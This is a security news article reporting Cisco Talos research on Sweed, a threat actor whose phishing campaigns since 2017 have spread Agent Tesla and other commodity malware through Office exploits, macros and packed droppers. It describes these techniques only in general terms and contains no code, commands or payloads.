A threat actor named Sweed who has been active for more than two years using spearphishing emails with malicious attachments to spread Formbook, Lokibot and Agent Tesla has been given a detailed examination by Cisco Talos.Cisco Talos researcher Edmund Brumaghin said for the most part Agent Tesla is the group’s favorite flavor of malware, but noted Sweed has used a variety of delivery methods since 2017.The first that was used in 2017 had Sweed place a dropper
inside a .zip archive containing Agent Tesla and then attached the file to an
email claiming to contain a purchase order. The packer used .NET and leveraged
steganography to hide and decode a second .NET executable, which uses the same
technique to retrieve the final Agent Tesla payload, Brumaghin wrote.Then in January 2018 Sweed moved on to Java-based droppers, which were also attached to emails claiming to be a purchase or order of some type. The next change for Sweed took place in April 2018 and to exploit the previously known CVE-2017-8759, a vulnerability in Microsoft Office, specifically PowerPoint. Code placed inside a slide triggers the remote code execution vulnerability in Microsoft .NET framework.The next month Sweed moved on to another Office remote code
execution flaw, CVE-2017-11882, and used in fake invoices to again download
Agent Tesla.2019 saw Sweed continuing to use Office, but this time
instead of exploiting a vulnerability it leveraged Office macros with email
attachments to purported product orders. These could take the form of being an
obfuscated VBA macro executing a PowerShell script using a WMI call with the
PowerShell script itself being camouflaged using XOR operations. Once decoded
the script is revealed to be .NET which then performs a couple of checks and
downloads and executes what turns out to be an AutoIT-compiled script. Other features of Sweed’s operation is it has not regional
focus, but attacks countries across the globe, including the U.S. Canada,
Russia, China, Singapore and South Africa. The threat actors are also not
zeroed in on any particular industry hitting primarily logistics and
manufacturing entities with a sprinkling of energy and defense companies for
good measure.Talos was also able to identify an actor on several forums that
went by Sweed or Swee D, and actively interacted with that person. The
individual claimed to be an ethical hacker, but further investigating found a
person with the same name in a forum working with stolen credit card
information.Because these identities were found with relative ease many
of the tools used are from easily obtained kits, Brumaghin described Sweed as
likely an amateur.“Based on the TTPs used by this group, SWEED should be
considered a relatively amateur actor. They use well-known vulnerabilities,
commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and
appear to rely on kits readily available on hacking forums. SWEED consistently
leverages packing and crypting in order to minimize detection by anti-malware
solutions,” he said.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
Related Terms
AdwareYou can skip this ad in 5 seconds